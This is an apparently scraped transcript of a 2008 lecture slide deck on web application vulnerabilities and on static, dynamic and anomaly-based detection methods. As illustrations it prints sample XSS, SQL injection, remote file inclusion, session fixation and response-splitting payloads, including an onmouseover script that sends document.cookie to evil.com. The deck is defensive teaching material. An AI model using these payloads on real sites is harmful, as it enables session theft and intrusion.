Vulnerability Analysis of Web-based Applications

1. Dec. 18/2008 Vulnerability Analysis of Web-basedApplications This technical clue partly explains why we need to do the protocol parsing for the Internet traffic.This technical clue partly explains why we need to do the protocol parsing for the Internet traffic.

2. 2 Outline Current web security trend Web Technologies Web based attacks Vulnerability Analysis Conclusion

3. web security As web applications for critical services has increased, attacks against web has grown as well. A series of characteristics make it a valuable for an attacker. web applications are often designed to be widely accessible Web applications often interface with back-end component containing sensitive data most popular web languages are currently easy enough to allow novices to start their own applications 3/50 As the use of web applications for critical services has increased, the number and sophistication of attacks against web application has grown as well. A series of characteristics of web-based applications make them a valuable target for an attacker. First, web applications are often designed to be widely accessible. they are almost always reachable through ?rewalls and a signi?cant part of their functionality is available to anonymous users. 2. web-based applications often interface with back-end components, such as mainframes and product databases, that might contain sensitive data, such as credit card information. 3. some of the most popular languages used to develop web-based applications are currently easy enough to allow novices to start writing their own applications As the use of web applications for critical services has increased, the number and sophistication of attacks against web application has grown as well. A series of characteristics of web-based applications make them a valuable target for an attacker. First, web applications are often designed to be widely accessible. they are almost always reachable through ?rewalls and a signi?cant part of their functionality is available to anonymous users. 2. web-based applications often interface with back-end components, such as mainframes and product databases, that might contain sensitive data, such as credit card information. 3. some of the most popular languages used to develop web-based applications are currently easy enough to allow novices to start writing their own applications

4. Trend In the ?rst semester of 2005, Symantec cataloged 1,100 new vulnerabilities, which represent well over half of all new vulnerabilities, as affecting web-based applications. 4/50

5. 5 Outline Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion

6. Common Gateway Interface One of the first mechanisms enabled dynamic content : Common Gateway Interface (CGI) It defines a mechanism that a server can use to interact with external applications. Disadvantage: requires to create a new process and executed for each request Server-specific APIs: Low initialization cost and can perform more general functionalities than CGI-based programs. complex when writing a program, it involves some knowledge of the server�s inner workings. 6/50 CGI programs can be written virtually in any programming language and executed by virtually all web servers. the use of a separate process for each request poses a limit to the maximum number of requests that can be satis?ed at the same time, which is bounded by the maximum number of processes allowed by the OS. CGI programs can be written virtually in any programming language and executed by virtually all web servers. the use of a separate process for each request poses a limit to the maximum number of requests that can be satis?ed at the same time, which is bounded by the maximum number of processes allowed by the OS.

7. 7/50

8. Embedded Web Application Frameworks Today, most web application implementation is a middle way between original CGI and server specific APIs. an interpreter or compiler used to encode the application�s components and define rules that govern the interaction between the server and the application�s components. Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python. (interpreted, object-oriented, loosely typed) 8/50 an interpreter or compiler for the language used to encode the application�s components and define rules that govern the interaction between the server and the application�s components. These are high-level languages, which are generally interpreted, provide support for object-oriented programming and are loosely typed. These characteristics simplify the development of small componentsan interpreter or compiler for the language used to encode the application�s components and define rules that govern the interaction between the server and the application�s components. These are high-level languages, which are generally interpreted, provide support for object-oriented programming and are loosely typed. These characteristics simplify the development of small components

9. A sample PHP program 9/50

10. 10 Outline Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion

11. Attacks Web-based applications have fallen prey to a variety of different attacks that violate different security properties. This survey focuses on attacks behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker. Currently, most of attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation. 11/50

12. Interpreter Injection Many dynamic languages include functions to dynamically compose and interpret code. include and require - Includes and evaluates a file as PHP code. eval, preg_replace - Evaluates a string as PHP code. exec, passthru, system, popen, shell_exec, popen, pcntl_exec, proc_open and the backtick - Executes its input as a shell command. Attack on the server 12/50

13. Sample of interpreter injection in Double Choco Latte 13/50

14. Filename Injection Most languages of web are allowed to dynamically include files to interpret content or present them to users. E.g. to generate different page content depending on user�s preferences, such as for internationalization purposes. Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker�s control. 14/50

15. a filename injection vulnerability in txtForum In txtForum, pages are divided in parts, e.g., header, footer, forum view, and can be customized by using different �skins,� which are different combination of colors, fonts, and other presentation parameters. Skin with value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl 15/50

16. Script Cross-site attack (XSS) In the attack, an attacker forces a client, typically a web browser, to execute attacker-supplied executable code, typically JavaScript code, which runs in the context of a trusted web site. Sample: http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script> 16/50

17. Impact of XSS-Attacks Access to authentication credentials for Web application Cookies, Username and Password XSS is not a harmless flaw ! Normal users Access to personal data (Credit card, Bank Account) Access to business data (Bid details, construction details) Misuse account (order expensive goods) High privileged users Control over Web application Control/Access: Web server machine Control/Access: Backend / Database systems 17

18. SQL Injection A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation. This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application. $activate = $_GET [" activate "]; $result = dbquery (" SELECT * FROM new_users " , " WHERE user_code =� $activate �"); 18/50

19. SQL Injection 19/50

20. Session Hijacking HTTP is a stateless protocol, no built-in mechanism allows application to maintain state throughout a session. The session state can be maintained in different ways. It can be encoded in a document transmitted to the user in a way, such as cookie or HTML hidden form ?elds and sent back as part of later requests. Problem: the cookie or hidden forms may be changed by dishonest users. each user is assigned a unique session ID Problem: Session fixation 20/50 However, all non-trivial applications need a way to correlate current request with the history of previous requestsHowever, all non-trivial applications need a way to correlate current request with the history of previous requests

21. Session Hijacking Session fixation: the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. http://[target]/login.php?sessionid=1234 21/50 The attacker now only has to wait until the user logs in.The attacker now only has to wait until the user logs in.

22. Response Splitting the attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses To perform response splitting the attacker must be able to inject data containing the header termination characters and the beginning of a second header. This is usually possible when user�s data is used (unsanitized) to determine the value of an HTTP header 22/50

23. Response Splitting <% response.sendRedirect (�/by_lang.jsp?lang =" + request. getParameter (" lang "));%> Location: http://vulnerable.com/by_lang.jsp?lang=en_US. However, if the lang= dummy%0d%0a Content-Length:%200 %0d%0a%0d%0a HTTP/1.1%20200%20OK%0d%0a Content-Type:%20text/html%0d%0a Content-Length:%2019%0d%0a%0d%0a <html>New document</html> 23/50

24. Response Splitting Response Splitting often related to the attack of web cache poisoning Two condition: a caching proxy server interprets the response stream as containing two documents associates the second one with the original request, then an attacker would be able to insert in the cache of the proxy a page of his choice in association to a URL in the vulnerable application. 24/50

25. 25 Outline Current web security trend Web technologies Web based attacks Vulnerability Analysis Conclusion

26. Vulnerability analysis vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application�s code or the behavior for possible security problems. The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability based) approach and the positive (behavior based) approach. 26/50

27. Detection approach Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities. Positive approach: builds models of the normal behavior of an application (eg. using machine-learning techniques) and then analyze the application behavior to identify any abnormality that might be caused by a security violation. Two fundamental analysis techniques that can be used to do the analysis : static analysis and dynamic analysis. 27/50

28. Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. it does not require the application to be deployed and executed. Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done on run-time. In practice, hybrid approaches mixed both static and dynamic techniques, are frequently used to combine the strengths and minimize the limitations of the two approaches. 28/50 Since the analysis is done on a �live� application, it is less prone to false positives. However, it can suffer from false negatives, since only a subset of possible input values is usually processed by the application and not all vulnerable execution paths are exercised. Since the analysis is done on a �live� application, it is less prone to false positives. However, it can suffer from false negatives, since only a subset of possible input values is usually processed by the application and not all vulnerable execution paths are exercised.

29. 29 Outline Current web security trend Web Technologies Web based attacks Vulnerability Analysis Negative approach Positive approach Conclusion

30. Negative approach: taint propagation Most negative approaches assumes that vulnerabilities are the result of insecure data flow in applications. We attempt to identify when untrusted user input propagates to security-critical functions(sinks) without being properly checked and sanitized. taint propagation: data from input is marked as tainted and its propagation throughout the program is traced to check whether it can reach sinks. 30/50

31. Negative static Approaches static analysis can be applied before the deployment. It does not require modification of the deployment environment. Currently focus on the analysis of applications written in PHP and Java It may require the source code of web site to do analysis. 31/50 static analysis usually does not require modification of the deployment environment, which might introduce overhead and also pose a threat to the stability of the application. static analysis is especially suitable for the web applications domain, where the deployment of vulnerable applications or the execution in an unstable environment can result in a substantial business cost. static analysis usually does not require modification of the deployment environment, which might introduce overhead and also pose a threat to the stability of the application. static analysis is especially suitable for the web applications domain, where the deployment of vulnerable applications or the execution in an unstable environment can result in a substantial business cost.

32. WebSSARI (WWW�04) WebSSARI (WWW�04) is one of the first works that applies taint propagation analysis in web security. WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection. The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate. Typestate: PHP is extended with two types: tainted and untainted, the tool keeps track the type-state of variables. In order to untaint the tainted data, the data has to be processed by a sanitization routine or cast to a safe type. 32/50

33. It predefine 3 file: a file with preconditions to all sensitive functions (the sink) a file with of known sanitization functions, for untaited. a file specifying all possible sources of untrusted input When the tool finds tainted data reaches sinks, it automatically inserts sanitization routines. 33/50

34. If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { Typestate

35. If (A) { A=X; } else { if (B) { A=Y; } else { A=Z; } } Echo (A); If (C) { Typestate

36. 36 Runtime Protection Different sanitization routines are automatically inserted just before vulnerable function calls Depending on the vulnerable function, one of the three following routines is inserted HTML output sanitization Database command sanitization System command sanitization

37. 37 System Implementation

38. Problem of WebSSARI: Uses intra-procedural algorithm and thus only models information flow not cross function boundaries. (Xie Usenix 06) All dynamic variables, arrays are considered tainted, reduce the accuracy of the analysis. Can not accurately tracking arrays, alias and object-oriented code. (Pixy Oakland 06 ) 38/50

39. Summary static analysis heavily depends on language specific parsers. It is not generally a problem for general purpose languages Web applications use dynamic scripting languages to facilitate the use of complex data structures, such as arrays and hash, hard to track. One main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecisions.. Precise evaluation of sanitization routines is more difficult. Just regular expression maybe not enough 39/50

40. Dynamic negative approach Dynamic negative techniques is also based on taint analysis. Untrusted sources, sensitive sinks, and tainting propagates also need to be modeled Instead of running analysis on source code, program or interpreter are extended to collect the information and the tainted data is tracked as execution. Perl�s Taint mode: Perl interpreter is invoked with the �T option it makes sure that no data obtained from the outside environment can be used in security critical functions (too conservative) 40/50

41. �Automatically Hardening Web Applications Using Precise Tainting�, SEC�05 Propose modification of the PHP interpreter to dynamically track tainted data in PHP programs. Fully automated Aware of application semantics Replace PHP interpreter with a modified interpreter that: Keeps track of which information comes from untrusted sources (precise tainting) Checks how untrusted input is used 41/50

43. Coarse Grain Tainting Provided by many scripting languages (Perl, Ruby) Untrusted input is tainted Everything touched by tainted data becomes tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "; Entire $query string is tainted

44. Precise Tainting

45. Precise Checking Wrappers around PHP functions that handle updating and checking precise taint information Conservative: no false negatives while minimizing false positives Behavior only changes when an attack is likely

46. Preventing SQL Injection Parse the query using the SQL parser: identify interpreted text Disallow SQL keywords or delimiters in interpreted text that is tainted Query is not sent to database Error response it returned "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

47. Preventing PHP Injection Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state place wrappers around these functions to enforce this rule phpBB attack prevented by wrappers around preg_replace

48. Preventing Cross Site Scripting Wrappers around output functions Buffer output and then parse the tainted output with HTML Tidy Our defense takes advantage of precise tainting information to identify web page output generated from untrusted sources. Dangerous content was determined by examining HTML grammar Sanitize it by removing tags <b>Hello</b> ? Safe <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b> ? Unsafe

49. Summary of dynamic negative method a modified interpreter can be applied to all web applications, all required information is available as execution result. Further, no complex analysis for features such as alias analysis is required. However, no guarantees to all cases 49/50 1. Even more important, no complex analysis framework for features such as alias analysis is required, because all the required information is available as the result of program execution.1. Even more important, no complex analysis framework for features such as alias analysis is required, because all the required information is available as the result of program execution.

50. Summary of negative method If taint propagation is done statically, the precision highly depends on the ability of dealing the complexities of dynamic features. Precise evaluation of sanitization routines is especially important If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability and performance arise. 50/50

51. 51 Outline Current web security trend Web Technologies Web based attacks. Vulnerability Analysis Negative approach Positive approach Conclusion

52. Positive Approaches Based on deriving models of the �normal� behavior Assumption: Deviations mean attacks or vulnerabilities; attacks create an anomalous manifestation; an anomaly detection system utilizes a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application 52/50

53. Anomaly-based Based on assumption that normal traffic can be defined Attack patterns will differ from such �normal� traffic Anomaly-based detection system will go through a learning phase to register such �normal� traffic Analysis will be done for individual field attributes as well as for entire query string This difference should be able to be expressed quantitatively

54. Anomaly Detection of Web-based Attacks Cristopher Kruegel & Giovanni Vigna CCS �03 it is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily. This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications. The anomaly detection system takes as input the web server log files which conform to the Common Log Format and produces an anomaly score for each web request. 54/50

55. Data Model Only GET requests with no header 169.229.60.105 - johndoe [6/Nov/2002:23:59:59 -0800 "GET /scripts/access.pl?user=johndoe&cred=admin" 200 2122 Only Query string, no path For query q, Sq={a1,a2}

56. Detection model Each model is associated with weight wm. Each model returns the probability pm. A value close to 0 indicates anomalous event i.e. a value of pm close to 1 indicates anomalous event. If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.

57. Anomaly-based Some of the attributes that could be analyzed are: Input length Character distribution Parameter string structure Parameter absence or presence Order of parameters

58. Attribute Length Normal Parameters Fixed sized tokens (session identifiers) Short strings (input from HTML form) So, doesn�t vary much associated with certain prg. Malicious activity E.g. for buffer overflow Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviation from the normal

59. Learning & Detection Learning Calculate mean and variance for the lengths l1,l2,...,ln for the parameters processed. N queries with this attribute Detection Chebyshev inequality This computation bound has to be weak, to result in high degree of tolerance (very weak) Only obvious outliers are flagged as suspicious

60. Attribute character distribution Attributes have regular structure, printable characters There are similarities between the character frequencies of query parameters. Relative character frequencies of the attribute are sorted in relative order Normal freq. slowly decrease in value Malicious Drop extremely fast (peak cause by single character distrib.) Nearly not at all (random values)

61. Why is it useful? Cannot be evaded by some well-known attempts to hide malicious code in the string. Nop operation substituted by similar behavior (add rA,rA,0) But not useful in when small routine change in the payload distribution

62. Learning and detection Learning For each query attribute, its character distribution is stored ICD is obtained by averaging of all the stored character distributions

63. Learning and detection (cont...) Pearson chi-square test Not necessary to operate on all values of ICD consider a small number of intervals, i.e. bins Calculate observed and expected frequencies Oi= observer frequencies for each bin Ei= relative freq of each bin * length of the attribute Compute chi-square Calculate probability from chi-square predefined table

64. Structural inference Structural is the regular grammar that describes all of its normal legitimate values. Why?? Craft attack in a manner that makes its manifestation appear more regular. For example, non-printable characters can be replaces by groups of printable characters.

65. Learning and detection Basic approach is to generalize grammar as long as it seems reasonable and stop before too much structural information is lost. MARKOV model and Bayesian probability NFA Each state S has a set of ns possible output symbols o which are emitted with the probability of ps(o). Each transition t is marked with probability p(t), likelihood that the transition is taken.

66. Learning and detection (cont...)

67. Learning and detection (cont...)

68. Learning and detection (cont...) Aim to maximize the product. Conflict between simple models that tend to over-generalize and models that perfectly fit the data but are too complex. Simple model- high probability, but likelihood of producing the training data is extremely low. So, product is low Complex model- low probability, but likelihood of producing the training data is high. Still product is low. Model starts building up and generating input data then the states starts building up using Viterbi algorithm.

69. Learning and detection (cont...) Detection The problem is that even a legitimate input that has been regularly seen during the training phase may receive a very small probability values The probability values of all possible input words sum to 1 Model return value 1 if valid output otherwise 0 when the value cannot be derived from the given grammar

70. Token finder Whether the values of the attributes are from a limited set of possible alternatives (enumeration) When malicious user try to usually pass the illegal values to the application, the attack can b detected.

71. Learning and detection Learning Enumeration: when different occurrences of parameter values is bound by some threshold t. Random: when the no of different argument instances grows proportionally Calculate statistical correlation

72. Learning and detection (cont...) Detection If any unexpected happens in case of enumeration, then it returns 0, otherwise 1 and in case of randomness it always return 1.

73. Attribute presence of absence Client-side programs, scripts or HTML forms pre-process the data and transform in into a suitable request. Hand crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value and little attention is paid on the order.

74. Learning and detection Learning Model of acceptable subsets Recording each distinct subset Sq={ai,...ak} of attributes that is seen during the training phase. Detection The algorithm performs for each query a lookup of the current attribute set. If encountered then 1 otherwise 0

75. Attribute order Legitimate invocations of server-side programs often contain the same parameters in the same order. Hand craft attacks don�t To test whether the given order is consistent with the model deduced during the learning phase.

76. Learning and detection Learning: A set of attribute pairs O such that: Each vertex vi in directed G is associated with the corresponding attribute ai. For every query ordered list is processed. Att. Pair (as,at) in this list, with s ~= t and 1<=s,t<=i, a directed edge is inserted into the graph from vs to vt.

77. Learning and detection (cont...) Graph G contains all ordered constraints imposed by queries in the training data. Order is determined by Directed edge Path Detection Given a query with attributes a1,a2,...,ai and a set of order constraints O, all the parameter pairs (aj,ak) with j~=k and 1 <= j,k <= I Violation then return 0 otherwise 1

78. Conclusions of this paper Anomaly-based intrusion detection system on web. Takes advantage of application-specific correlation between server-side programs and parameters used in their invocation. Parameter characteristics are learned from the input data. Tested on Google, and two universities in US and Europe

79. Summary positive approaches Advantage: By specifying normal behavior, it can detect unknown attack Problem: the concept of normality is difficult to define vulnerable to mimicry attacks: detection threshold still requires manual intervention and substantial expertise. 79/50 The creation of models that correctly characterize the behavior of an application still requires the use of ad hoc heuristics and manual work. The creation of models that correctly characterize the behavior of an application still requires the use of ad hoc heuristics and manual work.

80. 80 Outline Current web security trend Web based attacks Vulnerability Analysis Conclusion

81. No method can be considered �the silver bullet�, many methods combine strengths from various techniques. Important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand Challenges by novel web-specific attack techniques. Improper input validation are well-known and studied There is no standard dataset usable as base-line for evaluation. 81/50 Every tool is evaluated on a different set of applications and a fair comparison of different approaches is not possible. it is important to provide techniques and tools to better model sanitization operations and to assess whether a sanitization operation is appropriate for the task at hand Every tool is evaluated on a different set of applications and a fair comparison of different approaches is not possible. it is important to provide techniques and tools to better model sanitization operations and to assess whether a sanitization operation is appropriate for the task at hand

82. Future our work To get some static and dynamic method specially support the XSS script code detection. 82/50

83. Thank you! 83

Vulnerability Analysis of Web-based Applications

Vulnerability Analysis of Web-based Applications

Presentation Transcript

Testing Web-based applications

Web Based Applications

11. Web-based Applications

Web-Based Applications

Web Based Applications

Vulnerability Analysis

Vulnerability Analysis

Testing Web-based applications

Performability of Web-based Applications

Vulnerability Analysis of Web-Based Applications

Vulnerability Analysis

Web-Based Applications

Pub/sub-based Web Applications

PROJECT Web-based Database Applications

Automata Based String Analysis for Vulnerability Detection

Web Based Applications

Software Assurance of Web-based Applications SAWbA